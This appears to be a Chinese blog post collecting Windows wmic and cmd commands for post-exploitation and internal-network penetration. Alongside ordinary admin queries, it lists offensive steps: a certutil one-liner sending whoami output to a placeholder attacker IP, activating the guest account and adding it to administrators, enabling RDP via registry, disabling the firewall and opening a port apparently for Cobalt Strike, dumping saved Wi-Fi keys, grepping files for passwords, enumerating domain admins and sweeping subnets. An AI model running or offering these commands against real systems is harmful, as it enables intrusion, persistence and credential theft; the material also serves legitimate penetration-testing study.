windows命令总结

前言

整理了一些命令，不只是wmic命令，也有其他的好玩命令。

wmic命令总结

查看计算机补丁安装详情

wmic qfe list 

列出进程

wmic process list brief

获取进程路径

wmic process get description,executablepath
wmic process where name="java.exe" get executablepath 

根据应用程序查找PID

wmic process where name="cmd.exe" get processid,executablepath,name

获取某个进程详情

wmic process where name="chrome.exe" list full

创建新进程

wmic process call create notepad
wmic process call create "C:\Program Files\Tencent\qq.exe"
wmic process call create "shutdown.exe -r -f -t 20"

删除指定进程

wmic process where name="qq.exe" call terminate
wmic process where processid="2316" delete
wmic process 2316 call terminate

查看启动项

wmic startup

查看共享

wmic share get name,path

查看安装的软件版本

wmic product get name,version

查看是否为虚拟机

wmic bios list full | find /i "vmware"

获取机器名

wmic path win32_computersystem get dnshostname

获取系统名称

wmic path win32_operatingsystem get name

查看系统32位还是64位

wmic path win32_operatingsystem get osarchitecture

获取系统域名

wmic path win32_computersystem get domain

获取AV详情

wmic /namespace:\\root\securitycenter2 path antivirusproduct GET displayName,productState, pathToSignedProductExe

base64编码

certUtil -encode 1.jsp 1.txt

base64解码

certUtil -decode 1.txt 1.jsp

cmd命令总结

输出结果到文件

net user > a.txt 2>&1

查看进程

tasklist /svc

删除进程

taskkill /f /im shell.exe

根据PID删除

taskkill /pid 5396 /F

路由跟踪

tracert IP

查询DNS

nslookup domain

查看登录用户

qwinsta

查看路由表

route print

查看计划任务

schtasks /query /fo list /v

类似vim命令，ctr+z退出，并创建成功

copy con  test.vbs 

递归查找某个文件

cd /d E: && dir /b /s Logon.aspx

Dns 带外命令执行

for /f %i in ('whoami') do certutil -urlcache -split -f http://x.x.x.x/%i  

命令执行不出网

cd c:\ && for /f %i in ('dir /s /b c:fastjson-1.2.47.jar') do (echo %i> %i.path.txt) & (ipconfig > %i.ipconfig.txt)

激活guest

net user guest /active:yes
net user guest Qax@123456
net  localgroup administrators guest  /add

递归查找文件内容

findstr /si password  config.*  *.ini *.txt     //查看后缀名文件中含有password关键字的文件

查看是否开启3389

REG QUERY "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections

0x1表示关闭，0x0表示开启

修改注册表开启3389

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

这里收集了两种。

查找TermService服务端口

tasklist /svc | findstr "TermService"
netstat -ano | find "PID"

批量扫描内网存活主机

for /l %i in (1,1,255) do @ping 10.0.0.%i -w 1 -n 1 | find /i "ttl" 

批量net view 输出机器名和ip

FOR /F "eol=- tokens=1 delims=\ " %a IN ('net view') DO @(echo name: %a, ip: & ping %a -w 1 -n 1 | find /i "ttl" & echo.) 

批量查找B段存活主机，保存为批处理文件。

@echo off
for /l %%i in (1,1,255) do (
    for /l %%j in (1,25,255) do (
      @ ping -w 1 -n 1 10.0.%%i.%%j | find /i "ttl="
    )
)

关闭防火墙
windows server 2003 及之前的版本

netsh fiewall set opmode disable

windows server 2003 及之后的版本

netsh advfiewall set allprofiles state off

添加防火墙规则

netsh advfirewall firewall add rule name=cs dir=in action=allow protocol=TCP localport=6666

查看防火墙策略

netsh firewall show config
netsh firewall show state

查看无线密码

netsh wlan show profiles
netsh wlan show profiles name="profiles" key=clear

内网渗透

启用telnet

dism /online /Enable-Feature /FeatureName:TelnetClient

查看域控制器

net group "Domain controllers"

查看当前网络域环境

net view /domain

查看域内管理员

net group "domain admins" /domain

查看域内所有机器名

net group "domain computers" /domain

查找外网对应的内网资产

for /f "delims=" %i in (domains.txt) do @ping -w 1 -n 1 %i | findstr /c:"test.com" >> service.txt

domains.txt为外网收集的域名，for循环ping域名，并将结果输出到service.txt
查找内网IP资产

for /f "delims=" %i in (web.txt) do @ping -w 1 -n 1 %i | findstr /c:"[10." /c:"[192." /c:"[172." >> out.txt

待补充......
参考资料
域渗透总结
WMIC后渗透利用
内网渗透常用命令总结
WMIC命令利用方式